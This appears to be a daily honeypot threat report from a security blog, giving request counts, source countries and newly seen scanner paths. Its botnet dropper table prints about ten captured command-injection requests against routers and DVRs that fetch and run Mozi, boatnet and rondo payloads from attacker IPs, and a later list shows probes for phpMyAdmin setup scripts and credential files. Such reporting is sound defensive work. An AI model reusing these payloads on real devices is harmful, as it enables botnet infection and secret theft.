Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-06-16

·760 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-06-16
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 10 stage 1 IP address(es), linked to 10 dropper URL(s).

There are 88 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1358 requests were recorded during the day, originating from 10 different countries, with a peak of 607 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai
USIsrael
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
222.134.175.9727;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
104.167.221.114POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%20%7C%7C%20cd%20%2Fvar%2Frun%20%7C%7C%20cd%20%2Fmnt%20%7C%7C%20cd%20%2Froot%20%7C%7C%20cd%20%2F%3B%20wget%20http%3A%2F%2F104.167.221.114%2Ftbkdvr.sh%3B%20chmod%20777%20tbkdvr.sh%3B%20sh%20tbkdvr.sh%3B%20tftp%20104.167.221.114%20-c%20get%20tbkdvr1.sh%3B%20chmod%20777%20tbkdvr1.sh%3B%20sh%20tbkdvr1.sh%3B%20tftp%20-r%20tbkdvr2.sh%20-g%20104.167.221.114%3B%20chmod%20777%20tbkdvr2.sh%3B%20sh%20tbkdvr2.sh%3B%20ftpget%20-v%20-u%20anonymous%20-p%20anonymous%20-P%2021%20104.167.221.114%20tbkdvr1.sh%20tbkdvr1.sh%3B%20sh%20tbkdvr1.sh%3B%20rm%20-rf%20tbkdvr.sh%20tbkdvr1.sh%20tbkdvr2.sh%20tbkdvr1.sh HTTP/1.1
141.98.11.147GET /shell?cd+/tmp;iptables+-I+INPUT+-p+tcp+-s+141.98.11.147+–dport+5500+-j+ACCEPT;+iptables+-I+INPUT+-p+tcp+–dport+5500+-j+DROP;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/x86;chmod+777+;./x86+x86;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm7;chmod+777+;./arm7+arm7;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm4;chmod+777+;./arm4+arm4;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm5;chmod+777+;./arm5+arm5 HTTP/1.1
141.98.11.83GET /shell?cd+/tmp;wget+http://94.26.90.251/payload1.sh+-O-+
45.135.194.34GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(killall+-9+mipsel+mpsl%3B%28wget+-O-+http%3A%2F%2F14.103.145.202%2Frondo.sh%7C%7Cbusybox+wget+-O-+http%3A%2F%2F14.103.145.202%2Frondo.sh%29+%7C+sh+-s+tplink%3B) HTTP/1.1
139.5.0.235GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://139.5.0.235:37799/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
144.172.116.95POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F160.187.246.150%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.1
87.121.84.34GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://31.59.40.187/x/tplink+-O-
45.135.194.34GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(killall+-9+mipsel+mpsl%3B%28wget+-O-+http%3A%2F%2F14.103.145.211%2Frondo.sh%7C%7Cbusybox+wget+-O-+http%3A%2F%2F14.103.145.211%2Frondo.sh%29+%7C+sh+-s+tplink%3B) HTTP/1.1
144.172.103.59POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F160.187.246.111%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
512HEAD /web/phpMyAdmin/scripts/setup.php HTTP/1.1
572HEAD /phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.1
582GET /phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.1
602GET /admin/phpmyadmin/scripts/setup.txt HTTP/1.1
632HEAD /phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.1
642HEAD /SQL/scripts/setup.php HTTP/1.1
652GET /phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.1
662HEAD /phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.1
672HEAD /phpmanager/scripts/setup.php HTTP/1.1
722GET /secrets.GITHUB_ENV HTTP/1.1
732GET /env.yaml HTTP/1.1
752GET /aws-exports.js HTTP/1.1
762GET /smtp.properties HTTP/1.1
772GET /smtp-secret.yaml HTTP/1.1
782GET /webdb/scripts/setup.php HTTP/1.1
802GET /phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.1
812HEAD /phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.1
822GET /websql/scripts/setup.php HTTP/1.1
832HEAD /websql/scripts/setup.php HTTP/1.1
842GET /run/secrets/smtp_pass HTTP/1.1
852GET /smtp_config.sh HTTP/1.1
862GET /config.lua HTTP/1.1
872GET /config/email.conf HTTP/1.1
882GET /config/email.ts HTTP/1.1
892GET /src/config/smtp.ts HTTP/1.1
922GET /mail.properties HTTP/1.1
942GET /Rocket.toml HTTP/1.1
962GET /config/smtp.go HTTP/1.1
972GET /Config/DefaultEngine.ini HTTP/1.1
982GET /Assets/Scripts/SMTPConfig.cs HTTP/1.1
992GET /app.config.js HTTP/1.1
1012HEAD /phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.1
1042GET /lib/config.dart HTTP/1.1
1062GET /_config.yml HTTP/1.1
1082GET /config/plugins.js HTTP/1.1
1102GET /config/initializers/email.rb HTTP/1.1
1112GET /server/config.js HTTP/1.1
1122GET /LocalConfiguration.php HTTP/1.1
1162GET /functions.php HTTP/1.1
1282HEAD /php/scripts/setup.php HTTP/1.1
1292GET /phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.1
1772HEAD /phpmy-admin/scripts/setup.php HTTP/1.1
1802GET /config/params.php HTTP/1.1
1822GET /config/packages/mailer.yaml HTTP/1.1
1832GET /app/Config/Email.php HTTP/1.1
1852GET /vapor.yml HTTP/1.1
1932GET /config/environments/development.rb HTTP/1.1
1942GET /config/environments/production.rb HTTP/1.1
1962HEAD /mysqlmanager/scripts/setup.php HTTP/1.1
1982GET /app/config.py HTTP/1.1
2002GET /config/mail.ts HTTP/1.1
2012GET /src/config/mail.config.ts HTTP/1.1
2032GET /config/smtp.js HTTP/1.1
3262HEAD /admin/phpmyadmin/scripts/setup.txt HTTP/1.1
3272GET /phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.1
3282HEAD /phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.1
3322HEAD /phpMyAdmin/scripts/setup.php HTTP/1.1
3371HEAD /phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.1
3381GET /phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.1
3621GET /6ZuX HTTP/1.1
3901GET /QNnO HTTP/1.1
4071GET /phpMyAdmin2/scripts/setup.php HTTP/1.1
4121GET /mysqlmanager/scripts/setup.php HTTP/1.1
4211GET /odinhttpcall1750075093 HTTP/1.1
4221GET /OdinHttpCall1750075093 HTTP/1.1
4241GET /Odin/http/call1750075093 HTTP/1.1
4281GET /phpma/scripts/setup.php HTTP/1.1
4341HEAD /mysqladmin/scripts/setup.php HTTP/1.1
4371HEAD /admin/pma/scripts/setup.php HTTP/1.1
4481GET /admin/scripts/setup.php HTTP/1.1
4511GET /phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.1
4521HEAD /phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.1
4531GET /phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.1
4541HEAD /phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.1
4551GET /phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.1
4561HEAD /phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.1
4571GET /phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.1
4591GET /webadmin/scripts/setup.php HTTP/1.1
4841GET /phpmanager/scripts/setup.php HTTP/1.1
4881GET /sqlmanager/scripts/setup.php HTTP/1.1
4891GET /SQL/scripts/setup.php HTTP/1.1
4911GET /_phpMyAdmin/scripts/setup.php HTTP/1.1
4921GET /phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.1
5001HEAD /phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.1
5011GET /phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.1
5031GET /phpMyAdmin3/scripts/setup.php HTTP/1.1
5171\x00\x0E\x08\x9D\xA6f\xEA\xAE[\x84\xBE\x00\x00\x00\x00\x00
5181\x00\x0E8\x9D\xA6f\xEA\xAE[\x84\xBE\x00\x00\x00\x00\x00

country_iso_code
#

number_of_occurencecountry_iso_code
0607US
1146DE
292ES
365CN
462NL
551BG
646FR
742SA
822LT
922VN
1020PL
1116SC
1215KZ
1315GB
1414CA
1514JP
1613AU
1712EG
1810IL
199GH
208RU
217KR
226AO
235NG
244HK
254BE
263CH
273CZ
283IN
293SG
303BR
312IE
322RO
332MD
342MN
351TR
361KE
371PT
381PK
391IR
401CL
411ID
421AR

Related

Report: 2025-06-15
·420 words
Repport Daily
Report: 2025-06-14
·585 words
Repport Daily
Report: 2025-06-13
·2684 words
Repport Daily